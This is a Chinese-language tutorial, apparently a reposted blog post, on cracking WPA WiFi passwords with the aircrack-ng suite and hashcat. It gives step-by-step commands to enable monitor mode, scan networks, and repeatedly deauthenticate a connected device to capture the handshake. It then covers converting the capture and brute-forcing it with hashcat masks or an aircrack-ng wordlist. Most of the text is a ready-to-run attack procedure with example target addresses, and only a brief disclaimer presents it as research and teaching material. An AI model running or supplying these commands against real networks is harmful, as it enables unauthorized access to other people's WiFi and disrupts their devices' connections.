HashCat wifi密码
WIFI 密码
要破解 WIFI 密码,首先要抓到 WIFI 的握手包,要想得到 WIFI 的握手包,就需要在监听时刚好有设备连接了该 WIFI,但这就需要运气加成,因此可以我们可以主动将该 WIFI 的设备踢下去,一般设备就会自动连接该 WIFI,此时我们就抓到握手包了。
air*-ng 工具套件介绍:
https://www.cnblogs.com/coisini-zheng/p/15841050.html
命令 | 说明 |
---|---|
aircrack-ng | 破解WEP以及WPA(字典攻击)密钥 |
airdecap-ng | 通过已知密钥来解密WEP或WPA嗅探数据 |
airmon-ng | 将网卡设定为监听模式 |
aireplay-ng | 数据包注入工具(Linux和Windows使用CommView驱动程序) |
airodump-ng | 数据包嗅探:将无线网络数据输送到PCAP或IVS文件并显示网络信息 |
airtun-ng | 创建虚拟管道 |
airolib-ng | 保存、管理ESSID密码列表 |
packetforge-ng | 创建数据包注入用的加密包。 |
Tools | 混合、转换工具 |
airbase-ng | 软件模拟AP |
airdecloak-ng | 消除pcap文件中的WEP加密 |
airdriver-ng | 无线设备驱动管理工具 |
airolib-ng | 保存、管理ESSID密码列表,计算对应的密钥 |
airserv-ng | 允许不同的进程访问无线网卡 |
buddy-ngeasside-ng | 的文件描述 |
easside-ng | 和AP接入点通讯(无WEP) |
tkiptun-ng | WPA/TKIP攻击 |
wesside-ng | 自动破解WEP密钥 |
https://cloud.tencent.com/developer/article/1756342?from=15425
抓取 WIFI 握手包
1、将网卡处于监听状态
airmon-ng check
airmon-ng check kill // 关闭影响监听状态的进程
airmon-ng start wlan0
wlan0 是网卡名称,一般都是 wlan0,如果不是则需要根据自己的情况进行修改,可通过 iwconfig 进行查看网卡的名称
当使用 iwconfig 查看网卡名称变为 wlan0mon 说明此时网卡已经处于监听模式了
2、扫描可用 WIFI
airodump-ng wlan0mon
3、获取wifi的握手包
1)扫描设备信息
airodump-ng -c (上一步扫描的 CH ) --bssid (想要破解 WIFI 的 bssid ) -w (握手文件存放目录) wlan0mon
这里以 ssid 为 teamssix 的 WIFI 为例
airodump-ng -c 1 --bssid 5E:C1:1B:A2:37:F1 -w ./ wlan0mon
2)为了顺利得到 WIFI 的握手包,可以将该 WIFI 下的设备强制踢下去
aireplay-ng -0 0 -a (要破解的 wifi 的 bssid ) -c (强制踢下的设备的 MAC 地址) wlan0mon
可以看到 teamssix 这个 WIFI 有一个设备正在连接,该设备的 MAC 地址为:38:26:2C:13:D3:33,使用以下命令可以将其强制踢下去
aireplay-ng -0 0 -a 5E:C1:1B:A2:37:F1 -c 38:26:2C:13:D3:33 wlan0mon
等待设备重新连接后,当右上角出现 WPA handshake 的时候说明获取成功
参数说明:
https://blog.csdn.net/qq_28773223/article/details/128104513
-0 表示端口连接
0 表示断开的次数(0为无数次)
-a 表示要破解的WIFI路由器 (BSSID列)
-c 表示要踢下线的设备(手机终端) (STATION列)
抓包还可以用 CDLinux 下,水滴工具。
4. 握手包转码
hashcat 使用的是 hccapx 后缀的文件,而上面的获取到的 是cap后缀文件,所以要转码。
1)方式一:在线转码, 使用 hashcat 官网提供的在线工具进行格式转换:
会在同目录下生成 1.hccapx 文件
2)方式二:本地工具转码,hashcat-utils-1.9
介绍页:https://hashcat.net/wiki/doku.php?id=hashcat_utils
下载地址:https://github.com/hashcat/hashcat-utils/releases
cap2hccapx 1.cap 1.hccapx
会在同目录下生成 1.hccapx 文件
cap 名字建议使用 MAC地址命名,防止乱
5、破解密码
1)方式一:使用自带的库生成
hashcat -a 3 -m 2500 1.hccapx ?d?d?d?d?d?d?d?d --force
或者
hashcat -a 3 -m 22000 1.hc22000 ?d?d?d?d?d?d?d?d --force
2)方式二:字典破解
https://blog.csdn.net/qq_28773223/article/details/128104513
aircrack-ng -w passwd.txt -b 5E:C1:1B:A2:37:F1 ./test.cap
-w 密码字典
-b 设备的MAC(BSSID)
./test.cap cap文件
作者:TeamsSix
链接:https://www.jianshu.com/p/52d1ed684020
来源:简书
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
免责声明:本号所涉及内容仅供安全研究与教学使用,如出现其他风险,后果自负。
参考、来源:
https://blog.csdn.net/m0_58523239/article/details/126330632
https://www.cnblogs.com/jiu0821/p/7628988.html
https://www.cnblogs.com/answerThe/p/12488477.html
https://www.cnblogs.com/answerThe/p/12488383.html
http://anycastyun.com/news/547-cn.html